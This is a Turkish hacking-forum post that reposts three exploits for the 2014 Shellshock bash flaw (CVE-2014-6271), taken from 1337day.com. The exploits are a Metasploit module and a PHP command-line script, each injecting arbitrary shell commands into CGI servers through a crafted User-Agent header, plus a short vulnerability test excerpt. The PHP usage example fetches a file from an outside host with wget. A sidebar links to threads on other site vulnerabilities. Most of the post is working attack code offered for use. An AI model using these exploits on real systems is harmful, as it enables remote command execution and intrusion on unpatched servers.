Konuyu Oyla:
  • Derecelendirme: 4/5 - 2 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Unix Bash Açığı Exploitleri / 1337day.com Exploitleri
#1
Arkadaşlar Yeni Çıkan Bash Açığı İle 500 Milyon Kadar Bilgisayarın Etkileneceği Düşünülüyor.
Haber : Unix'teki Bash Açığı Tehlikesi Büyüyor !!
Alıntı:1. Exploit
http://1337day.com/exploit/description/22693
http://1337day.com/exploit/22693
PHP Kod:
require 'msf/core'
  
class Metasploit3 Msf::Auxiliary
  
    
include Msf::Exploit::Remote::HttpClient
  
  
    def initialize
(info = {})
        
super(update_info(info,
            
'Name'           => 'bashedCgi',
            
'Description'    => %q{
               
Quick dirty module to send the BASH exploit payload (CVE-2014-6271to CGI scripts that are BASH-based or invoke BASHto execute an arbitrary shell command.
            },
            
'Author'         =>
              [
                
'Stephane Chazelas',                      # vuln discovery
                
'Shaun Colley <scolley at ioactive.com>'  # metasploit module
              
],
            
'License'        => MSF_LICENSE,
            
'References'     => [ 'CVE''2014-6271' ],
            
'Targets'        =>
                [
                    [ 
'cgi', {} ]
                ],
            
'DefaultTarget'  => 0,
            
'Payload'        =>
                {
                
'Space'      => 1024,
                
'DisableNops' => true
                
},
            
'DefaultOptions' => { 'PAYLOAD' => }
        ))
  
            
register_options(
                [
                    
OptString.new('TARGETURI', [true'Absolute path of BASH-based CGI''/']),
                    
OptString.new('CMD', [true'Command to execute''/usr/bin/touch /tmp/metasploit'])
                ], 
self.class)
    
end
  
    def run
        res 
send_request_cgi({
            
'method'   => 'GET',
            
'uri'      => datastore['TARGETURI'],
            
'agent'    => "() { :;}; " datastore['CMD']
        })
  
        if 
res && res.code == 200
            print_good
("Command sent - 200 received")
        else
            
print_error("Command sent - non-200 reponse")
        
end
    end
end
 
# 85A9CFF0728D13D1   1337day.com [2014-09-28]   1888388C48740A0E # 
Alıntı:2. Exploit
http://1337day.com/exploit/description/22691
http://1337day.com/exploit/22691
PHP Kod:
The following is an excerpt fromhttps://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
  
Like “real” programming languagesBash has functionsthough in a somewhat limited implementation, and it is possible to put these bash functions into environment variablesThis flaw is triggered when extra code is added to the end of these function definitions (inside the enivronment variable). Something like:
  
env x='() { :;}; echo vulnerable' bash -"echo this is a test"
 
vulnerable
 this is a test
  
The patch used to fix this flaw
ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bashyou should get an output similar to:
  
 $ 
env x='() { :;}; echo vulnerable' bash -"echo this is a test"
 
bashwarningxignoring function definition attempt
 bash
error importing function definition for `x'
 this is a test
 
# 484320FF55EDD220   1337day.com [2014-09-28]   F9F8D00661F71520 # 
Alıntı:3. Exploit
http://1337day.com/exploit/description/22692
http://1337day.com/exploit/22692
PHP Kod:
<?php
/*
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
       GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
       Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
  
Test CGI Code : #!/bin/bash
        echo "Content-type: text/html"
        echo ""
        echo "Bash-is-Vulnerable"
  
*/
error_reporting(0);
if(!
defined('STDIN')) die("Please run it through command-line!\n");
$x  getopt("u:c:");
if(!isset(
$x['u']) || !isset($x['c']))
{
die(
"Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");
  
}
$url $x['u'];
$cmd $x['c'];
  
    
$context stream_context_create(
        array(
            
'http' => array(
                
'method'  => 'GET',
                
'header'  => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
            
)
        )
    );
      
    if(!
file_get_contents($urlfalse$context) && strpos($http_response_header[0],"500") > 0)
    die(
"Command sent to the server!\n");
    else
    die(
"Connection Error\n");
?>
 
# CC94A489856180E4   1337day.com [2014-09-28]   CC4089344E68D353 # 

Selametle / '[D3F@C4R]
Beğenenler: M4M00D

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  UpL Image Board_2 Content Dosya Yükleme Açığı KingSkrupellos 5 105 Dün, Saat: 12:21
Son Yorum: antisecureman
  Desenvolvido de Markcerto SQL Enjeksiyon Açığı KingSkrupellos 11 201 30-11-2016, Saat: 16:56
Son Yorum: xApocalypse
  Website by Raw Marketing Editor Asset Dosya Yükleme Açığı KingSkrupellos 7 120 30-11-2016, Saat: 08:48
Son Yorum: the_zizil
  Natural Software CMS Yönetici Atlatma Açığı KingSkrupellos 7 125 30-11-2016, Saat: 02:56
Son Yorum: 0xfans
  WP Premium Gallery Manager Plugin Dosya Yükleme Açığı KingSkrupellos 7 106 27-11-2016, Saat: 15:07
Son Yorum: Efetimi
Anahtar Kelimeler

Unix Bash Açığı Exploitleri / 1337day.com Exploitleri indir, Unix Bash Açığı Exploitleri / 1337day.com Exploitleri Videosu, Unix Bash Açığı Exploitleri / 1337day.com Exploitleri Online izle, Unix Bash Açığı Exploitleri / 1337day.com Exploitleri Bedava indir, Unix Bash Açığı Exploitleri / 1337day.com Exploitleri Yükle, Unix Bash Açığı Exploitleri / 1337day.com Exploitleri Hakkında, Unix Bash Açığı Exploitleri / 1337day.com Exploitleri Nedir, Unix Bash Açığı Exploitleri / 1337day.com Exploitleri Free indir, Unix Bash Açığı Exploitleri / 1337day.com Exploitleri Oyunu, Unix Bash Açığı Exploitleri / 1337day.com Exploitleri Download


1 Ziyaretçi